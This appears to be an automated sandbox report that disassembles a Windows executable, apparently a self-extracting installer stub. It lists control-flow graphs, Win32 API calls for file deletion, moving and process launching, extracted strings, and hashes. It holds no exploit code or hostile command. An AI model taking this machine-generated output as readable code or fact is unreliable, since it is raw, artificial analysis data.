                                                                                      control_flow_graph 404 41aa45-41aa5d call 41cdf0 call 41cec0 409 41aa63-41aa8d call 4196ec 404->409 410 41b645-41b652 404->410 409->410 413 41aa93-41aa98 409->413 414 41aa99-41aaa7 413->414 415 41aaa8-41aab8 call 4193ba 414->415 418 41aaba 415->418 419 41aabc-41aad1 call 410b12 418->419 422 41aad3-41aad7 419->422 423 41aade-41aae1 419->423 422->419 424 41aad9 422->424 425 41b611-41b63c call 4196ec 423->425 426 41aae7 423->426 424->425 425->414 439 41b642-41b644 425->439 428 41ad9b-41ad9d 426->428 429 41acdd-41acdf 426->429 430 41aaee-41aaf1 426->430 431 41ad7e-41ad80 426->431 428->425 436 41ada3-41adaa 428->436 429->425 432 41ace5-41acf1 429->432 430->425 435 41aaf7-41ab64 call 418b8e call 40b56e call 40a11c call 40a256 call 406fa3 call 40a1a9 430->435 431->425 434 41ad86-41ad96 SetWindowTextW 431->434 437 41acf3-41ad04 call 424654 432->437 438 41ad05-41ad0a 432->438 434->425 504 41acc9-41acd8 call 40a132 435->504 505 41ab6a-41ab70 435->505 436->425 441 41adb0-41adc9 436->441 437->438 445 41ad14-41ad1f call 419844 438->445 446 41ad0c-41ad12 438->446 439->410 442 41add1-41addf call 4220b3 441->442 443 41adcb 441->443 442->425 459 41ade5-41adee 442->459 443->442 451 41ad24-41ad26 445->451 446->451 456 41ad31-41ad51 call 4220b3 call 4220de 451->456 457 41ad28-41ad2f call 4220b3 451->457 478 41ad53-41ad5a 456->478 479 41ad6a-41ad6c 456->479 457->456 463 41adf0-41adf4 459->463 464 41ae17-41ae1a 459->464 463->464 469 41adf6-41adfe 463->469 470 41ae20-41ae23 464->470 471 41aeff-41af0d call 40f10e 464->471 469->425 475 41ae04-41ae12 call 40f10e 469->475 476 41ae30-41ae4b 470->476 477 41ae25-41ae2a 470->477 487 41af0f-41af23 call 42031b 471->487 475->487 490 41ae95-41ae9c 476->490 491 41ae4d-41ae87 476->491 477->471 477->476 483 41ad61-41ad69 call 424654 478->483 484 41ad5c-41ad5e 478->484 479->425 486 41ad72-41ad79 call 4220ce 479->486 483->479 484->483 486->425 506 41af30-41af83 call 40f10e call 419592 GetDlgItem SetWindowTextW SendMessageW call 4220e9 487->506 507 41af25-41af29 487->507 497 41aeca-41aeed call 4220b3 * 2 490->497 498 41ae9e-41aeb6 call 4220b3 490->498 526 41ae89 491->526 527 41ae8b-41ae8d 491->527 497->487 531 41aeef-41aefd call 40f0e6 497->531 498->497 517 41aeb8-41aec5 call 40f0e6 498->517 504->425 510 41ab77-41ab8c SetFileAttributesW 505->510 541 41af88-41af8c 506->541 507->506 511 41af2b-41af2d 507->511 518 41ac32-41ac3e GetFileAttributesW 510->518 519 41ab92-41abc5 call 40b100 call 40adf5 call 4220b3 510->519 511->506 517->497 524 41ac40-41ac4f DeleteFileW 518->524 525 41acae-41acc3 call 40a1a9 518->525 551 41abc7-41abd6 call 4220b3 519->551 552 41abd8-41abe6 call 40b52e 519->552 524->525 532 41ac51-41ac54 524->532 525->504 544 41ab72 525->544 526->527 527->490 531->487 538 41ac58-41ac84 call 403f5b GetFileAttributesW 532->538 549 41ac56-41ac57 538->549 550 41ac86-41ac9c MoveFileW 538->550 541->425 546 41af92-41afa4 SendMessageW 541->546 544->510 546->425 549->538 550->525 553 41ac9e-41aca8 MoveFileExW 550->553 551->552 558 41abec-41ac2b call 4220b3 call 41dea0 551->558 552->504 552->558 553->525 558->518
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0041AA4A
                                                                                        • Part of subcall function 004196EC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 004197B4
                                                                                      • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,0041A35D,?,00000000), ref: 0041AB7F
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0041AC39
                                                                                      • DeleteFileW.KERNEL32(?), ref: 0041AC47
                                                                                      • SetWindowTextW.USER32(?,?), ref: 0041AD90
                                                                                      • _wcsrchr.LIBVCRUNTIME ref: 0041AF1A
                                                                                      • GetDlgItem.USER32(?,00000066), ref: 0041AF55
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0041AF65
                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,0044412A), ref: 0041AF79
                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0041AFA2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                      • String ID: %s.%d.tmp$*AD$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                      • API String ID: 3676479488-716100531
                                                                                      • Opcode ID: 622bf043dd8a76b352227d489a6219c6f2389bf2d8d2dc4de7251a3099a2ed5e
                                                                                      • Instruction ID: 8d689342b2fa41dfb6b0fc96890bb5a1e696d7e2e6358883b56aade1e1f54f01
                                                                                      • Opcode Fuzzy Hash: 622bf043dd8a76b352227d489a6219c6f2389bf2d8d2dc4de7251a3099a2ed5e
                                                                                      • Instruction Fuzzy Hash: 52E17172901229AAEF20EBA1DD45EDF737CEF05344F1040ABF505E7141EB789B948BA9
                                                                                      Function 0040CED7 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 563 40ced7-40cf51 call 40c88e GetWindowRect GetClientRect 566 40cff2-40cffa 563->566 567 40cf57-40cf5f 563->567 568 40d034-40d04f GetSystemMetrics GetWindow 566->568 569 40cffc-40d02e GetWindowTextW call 40c91f SetWindowTextW 566->569 567->568 570 40cf65-40cfae 567->570 572 40d12d-40d12f 568->572 569->568 573 40cfb0 570->573 574 40cfb2-40cfb4 570->574 575 40d054-40d05a 572->575 576 40d135-40d13f 572->576 573->574 578 40cfb6 574->578 579 40cfb8-40cfee GetWindowLongW GetWindowRect 574->579 575->576 580 40d060-40d078 GetWindowTextW 575->580 578->579 579->566 582 40d07a-40d099 call 40c91f SetWindowTextW 580->582 583 40d09f-40d0a4 580->583 582->583 585 40d0a6-40d114 GetWindowRect 583->585 586 40d11b-40d12a GetWindow 583->586 585->586 586->576 587 40d12c 586->587 587->572
                                                                                      APIs
                                                                                        • Part of subcall function 0040C88E: _wcschr.LIBVCRUNTIME ref: 0040C8BD
                                                                                      • GetWindowRect.USER32(?,?), ref: 0040CF0E
                                                                                      • GetClientRect.USER32(?,?), ref: 0040CF1A
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0040CFBB
                                                                                      • GetWindowRect.USER32(?,?), ref: 0040CFE8
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0040D007
                                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D02E
                                                                                      • GetSystemMetrics.USER32(00000008), ref: 0040D036
                                                                                      • GetWindow.USER32(?,00000005), ref: 0040D041
                                                                                      • GetWindowTextW.USER32(00000000,?,00000400), ref: 0040D06C
                                                                                      • SetWindowTextW.USER32(00000000,00000000), ref: 0040D099
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0040D0AC
                                                                                      • GetWindow.USER32(00000000,00000002), ref: 0040D11E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                                                                                      • String ID: d
                                                                                      • API String ID: 4134264131-2564639436
                                                                                      • Opcode ID: 96f7ba82cad3894475a3ce3bd43f9f85c55c8d6cd92dd2559e924218854511db
                                                                                      • Instruction ID: 4c4d668eabaab6e196ac38b45d5c3418fdcc83312bd63ce0dbb7c09dd5a1c66b
                                                                                      • Opcode Fuzzy Hash: 96f7ba82cad3894475a3ce3bd43f9f85c55c8d6cd92dd2559e924218854511db
                                                                                      • Instruction Fuzzy Hash: 0F617F72208301AFD310DF69CD89E6FBBEAFBC9714F04552DF68492290C674E909CB56
                                                                                      Function 0041B70E Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 96windowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(00000068,00458958), ref: 0041B71D
                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00419325), ref: 0041B748
                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0041B757
                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,004302E4), ref: 0041B761
                                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0041B777
                                                                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0041B78D
                                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0041B7CD
                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0041B7D7
                                                                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0041B7E6
                                                                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0041B809
                                                                                      • SendMessageW.USER32(00000000,000000C2,00000000,00431368), ref: 0041B814
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$ItemShowWindow
                                                                                      • String ID: \
                                                                                      • API String ID: 1207805008-2967466578
                                                                                      • Opcode ID: cfdd689c34dfc6269b6f11cfe1c6fb5fbb63a90d10086bb70704fea4775c9d42
                                                                                      • Instruction ID: 6631bef3396d41285feac20f44f8eaee4ce7b707f09f9e7719080f9832114816
                                                                                      • Opcode Fuzzy Hash: cfdd689c34dfc6269b6f11cfe1c6fb5fbb63a90d10086bb70704fea4775c9d42
                                                                                      • Instruction Fuzzy Hash: FD2126712857447BE311EB249C45FAB7FDCEF82714F010629FB90A61D0D7A95908CAAB
                                                                                      Function 0041B9AA Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 179COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 621 41b9aa-41b9c2 call 41cec0 624 41b9c8-41b9d4 call 4220b3 621->624 625 41bc0e-41bc16 621->625 624->625 628 41b9da-41ba02 call 41dea0 624->628 631 41ba04 628->631 632 41ba0c-41ba19 628->632 631->632 633 41ba1b 632->633 634 41ba1d-41ba26 632->634 633->634 635 41ba28-41ba2a 634->635 636 41ba5e 634->636 637 41ba32-41ba35 635->637 638 41ba62-41ba64 636->638 639 41bbc2-41bbc7 637->639 640 41ba3b-41ba43 637->640 641 41ba66-41ba69 638->641 642 41ba6b-41ba6d 638->642 645 41bbc9 639->645 646 41bbbc-41bbc0 639->646 643 41ba49-41ba4f 640->643 644 41bbdb-41bbe3 640->644 641->642 647 41ba80-41ba92 call 40b09c 641->647 642->647 648 41ba6f-41ba76 642->648 643->644 650 41ba55-41ba5c 643->650 652 41bbe5-41bbe7 644->652 653 41bbeb-41bbf3 644->653 651 41bbce-41bbd2 645->651 646->639 646->651 656 41ba94-41baa1 call 410b12 647->656 657 41baab-41bab6 call 409dff 647->657 648->647 654 41ba78 648->654 650->636 650->637 651->644 652->653 653->638 654->647 656->657 662 41baa3 656->662 663 41bad3-41bae0 ShellExecuteExW 657->663 664 41bab8-41bacf call 40ae20 657->664 662->657 666 41bae6-41baf9 663->666 667 41bc0c-41bc0d 663->667 664->663 669 41bafb-41bb02 666->669 670 41bb0c-41bb0e 666->670 667->625 669->670 673 41bb04-41bb0a 669->673 671 41bb21-41bb40 call 41be69 670->671 672 41bb10-41bb19 670->672 674 41bb77-41bb83 CloseHandle 671->674 691 41bb42-41bb4a 671->691 672->671 682 41bb1b-41bb1f ShowWindow 672->682 673->670 673->674 675 41bb85-41bb92 call 410b12 674->675 676 41bb94-41bba2 674->676 675->676 688 41bbf8 675->688 680 41bba4-41bba6 676->680 681 41bbff-41bc01 676->681 680->681 686 41bba8-41bbae 680->686 681->667 685 41bc03-41bc05 681->685 682->671 685->667 689 41bc07-41bc0a ShowWindow 685->689 686->681 690 41bbb0-41bbba 686->690 688->681 689->667 690->681 691->674 692 41bb4c-41bb5d GetExitCodeProcess 691->692 692->674 693 41bb5f-41bb69 692->693 694 41bb70 693->694 695 41bb6b 693->695 694->674 695->694
                                                                                      APIs
                                                                                      • ShellExecuteExW.SHELL32(000001C0), ref: 0041BAD8
                                                                                      • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 0041BB1D
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 0041BB55
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041BB7B
                                                                                      • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 0041BC0A
                                                                                        • Part of subcall function 00410B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0040AC49,?,?,?,0040ABF8,?,-00000002,?,00000000,?), ref: 00410B28
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                                                      • String ID: $*QD$.exe$.inf
                                                                                      • API String ID: 3686203788-3162893476
                                                                                      • Opcode ID: f8536cb37a994040ae73b98f982a1ae57507ca6559871fba656a89ce7ca6d67d
                                                                                      • Instruction ID: 8731213ea26ecc7b6628077753aceb17293929b2abbdefd7acb9d7dce0091808
                                                                                      • Opcode Fuzzy Hash: f8536cb37a994040ae73b98f982a1ae57507ca6559871fba656a89ce7ca6d67d
                                                                                      • Instruction Fuzzy Hash: FF51B1705093809AD731AF21D9406EBB7A9EF85744F04081FE4C1936A5EBB9A9C4C7DA
                                                                                      Function 0040CACC Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 258COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 696 40cacc-40cb00 call 41cdf0 call 41cec0 call 420138 703 40cb02-40cb31 GetModuleFileNameW call 40b88c call 40f0e6 696->703 704 40cb33-40cb3c call 40f10e 696->704 708 40cb41-40cb65 call 409401 call 40973d 703->708 704->708 715 40cdb8-40cdd3 call 409437 708->715 716 40cb6b-40cb74 708->716 717 40cb77-40cb7a 716->717 719 40cb80-40cb86 call 409aeb 717->719 720 40cca8-40ccc8 call 4099e0 call 4220d3 717->720 725 40cb8b-40cbb2 call 40990d 719->725 720->715 730 40ccce-40cce7 call 40990d 720->730 731 40cc71-40cc74 725->731 732 40cbb8-40cbc0 725->732 746 40ccf0-40cd02 call 4220d3 730->746 747 40cce9-40ccee 730->747 733 40cc77-40cc99 call 4099e0 731->733 735 40cbc2-40cbca 732->735 736 40cbeb-40cbf6 732->736 733->717 749 40cc9f-40cca2 733->749 735->736 741 40cbcc-40cbe6 call 423660 735->741 738 40cc21-40cc29 736->738 739 40cbf8-40cc04 736->739 744 40cc55-40cc59 738->744 745 40cc2b-40cc33 738->745 739->738 743 40cc06-40cc0b 739->743 761 40cc67-40cc6f 741->761 762 40cbe8 741->762 743->738 750 40cc0d-40cc1f call 423589 743->750 744->731 752 40cc5b-40cc5e 744->752 745->744 751 40cc35-40cc4f call 423660 745->751 746->715 763 40cd08-40cd25 call 4106e9 call 4220ce 746->763 753 40cd27-40cd2f 747->753 749->715 749->720 750->738 769 40cc63 750->769 751->715 751->744 752->732 757 40cd31 753->757 758 40cd34-40cd41 753->758 757->758 765 40cd43-40cd45 758->765 766 40cdad-40cdb5 758->766 761->733 762->736 763->753 770 40cd46-40cd50 765->770 766->715 769->761 770->766 772 40cd52-40cd56 770->772 774 40cd90-40cd93 772->774 775 40cd58-40cd5f 772->775 777 40cd95-40cd9b 774->777 778 40cd9d-40cd9f 774->778 779 40cd61-40cd64 775->779 780 40cd86 775->780 777->778 782 40cda0 777->782 778->782 783 40cd82-40cd84 779->783 784 40cd66-40cd69 779->784 781 40cd88-40cd8e 780->781 785 40cda4-40cdab 781->785 782->785 783->781 786 40cd6b-40cd6e 784->786 787 40cd7e-40cd80 784->787 785->766 785->770 788 40cd70-40cd74 786->788 789 40cd7a-40cd7c 786->789 787->781 788->782 790 40cd76-40cd78 788->790 789->781 790->781
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0040CAD1
                                                                                      • _wcschr.LIBVCRUNTIME ref: 0040CAEF
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0040CAB3,?), ref: 0040CB0A
                                                                                        • Part of subcall function 004106E9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0040B25B,00000000,?,?,?,?), ref: 00410705
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
                                                                                      • String ID: *messages***$*messages***$R$a
                                                                                      • API String ID: 803915177-2900423073
                                                                                      • Opcode ID: 3cf54346dafddbf9a442e6f62d9e4e72b44aca791ba1dd71687e3651464213cb
                                                                                      • Instruction ID: 5d01c05e4704c8ac56468749e71a50d8e1f5d0d0108360dfdf889213d4f14061
                                                                                      • Opcode Fuzzy Hash: 3cf54346dafddbf9a442e6f62d9e4e72b44aca791ba1dd71687e3651464213cb
                                                                                      • Instruction Fuzzy Hash: 3391F3B1A00204DADB20DF68CC85BAE7BB4EF54304F10467FE649B72D2DA7C9985CB58
                                                                                      Function 004273AE Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 791 4273ae-4273c7 792 4273c9-4273d9 call 42b9bc 791->792 793 4273dd-4273e2 791->793 792->793 800 4273db 792->800 795 4273e4-4273ec 793->795 796 4273ef-427413 MultiByteToWideChar 793->796 795->796 798 4275a6-4275b9 call 41d783 796->798 799 427419-427425 796->799 801 427427-427438 799->801 802 427479 799->802 800->793 805 427457-427468 call 4259fc 801->805 806 42743a-427449 call 42f160 801->806 804 42747b-42747d 802->804 809 427483-427496 MultiByteToWideChar 804->809 810 42759b 804->810 805->810 816 42746e 805->816 806->810 819 42744f-427455 806->819 809->810 813 42749c-4274ae call 427a09 809->813 814 42759d-4275a4 call 427616 810->814 821 4274b3-4274b7 813->821 814->798 820 427474-427477 816->820 819->820 820->804 821->810 823 4274bd-4274c4 821->823 824 4274c6-4274cb 823->824 825 4274fe-42750a 823->825 824->814 828 4274d1-4274d3 824->828 826 427556 825->826 827 42750c-42751d 825->827 831 427558-42755a 826->831 829 427538-427549 call 4259fc 827->829 830 42751f-42752e call 42f160 827->830 828->810 832 4274d9-4274f3 call 427a09 828->832 835 427594-42759a call 427616 829->835 847 42754b 829->847 830->835 845 427530-427536 830->845 831->835 836 42755c-427575 call 427a09 831->836 832->814 844 4274f9 832->844 835->810 836->835 848 427577-42757e 836->848 844->810 849 427551-427554 845->849 847->849 850 427580-427581 848->850 851 4275ba-4275c0 848->851 849->831 852 427582-427592 WideCharToMultiByte 850->852 851->852 852->835 853 4275c2-4275c9 call 427616 852->853 853->814
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00422FC2,00422FC2,?,?,?,004275FF,00000001,00000001,F5E85006), ref: 00427408
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004275FF,00000001,00000001,F5E85006,?,?,?), ref: 0042748E
                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00427588
                                                                                      • __freea.LIBCMT ref: 00427595
                                                                                        • Part of subcall function 004259FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,004223AA,?,0000015D,?,?,?,?,00422F29,000000FF,00000000,?,?), ref: 00425A2E
                                                                                      • __freea.LIBCMT ref: 0042759E
                                                                                      • __freea.LIBCMT ref: 004275C3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1414292761-0
                                                                                      • Opcode ID: dcc6473d045fc85726197919ff7012ef034d173e66d40c9374a644f373eaad3e
                                                                                      • Instruction ID: 405c3cb4200d2a4ef09c7e7971009558dd8d18f38ea0314e7ab169633d0257c0
                                                                                      • Opcode Fuzzy Hash: dcc6473d045fc85726197919ff7012ef034d173e66d40c9374a644f373eaad3e
                                                                                      • Instruction Fuzzy Hash: 7351F672704226BBDB258F65EC41EBFB7A9EB44750F95462AFC04D7241EB38DC80C698
                                                                                      Function 00419036 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35comCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 0040F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0040F324
                                                                                        • Part of subcall function 0040F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0040DEC8,Crypt32.dll,?,0040DF4A,?,0040DF2E,?,?,?,?), ref: 0040F346
                                                                                      • OleInitialize.OLE32(00000000), ref: 0041904F
                                                                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00419086
                                                                                      • SHGetMalloc.SHELL32(004420E8), ref: 00419090
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                      • String ID: riched20.dll$3Ro
                                                                                      • API String ID: 3498096277-3613677438
                                                                                      • Opcode ID: 81a575dfc482eb7b7c0b6440b9be245820986232f6daec58e8b095882a9cb13c
                                                                                      • Instruction ID: 86e76cd08599cf34ba9ba1d68dd7a0611f4fc9149205cef994b38ce33a66f2dd
                                                                                      • Opcode Fuzzy Hash: 81a575dfc482eb7b7c0b6440b9be245820986232f6daec58e8b095882a9cb13c
                                                                                      • Instruction Fuzzy Hash: E3F04FB1C40109ABD710AF9ADC49AEEFFFCEF84300F10406BE854E2210D7B85645CBA5
                                                                                      Function 0040F9D1 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 0040FDC9: ResetEvent.KERNEL32(?,?,0040F9F3,011CE068,?,00441E74,00000000,0042F79B,000000FF,000001B8,0040FC8F,?,?,?,?,0040A5A0), ref: 0040FDE9
                                                                                        • Part of subcall function 0040FDC9: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,?,0040A5A0,?,?,?,?,0042F79B,000000FF), ref: 0040FDFD
                                                                                      • ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0040FA05
                                                                                      • CloseHandle.KERNEL32(?,?), ref: 0040FA1F
                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 0040FA38
                                                                                      • CloseHandle.KERNELBASE(?), ref: 0040FA44
                                                                                      • CloseHandle.KERNEL32(?), ref: 0040FA50
                                                                                        • Part of subcall function 0040FAC7: WaitForSingleObject.KERNEL32(?,000000FF,0040FD0B,?,?,0040FD80,?,?,?,?,?,0040FD6A), ref: 0040FACD
                                                                                        • Part of subcall function 0040FAC7: GetLastError.KERNEL32(?,?,0040FD80,?,?,?,?,?,0040FD6A), ref: 0040FAD9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
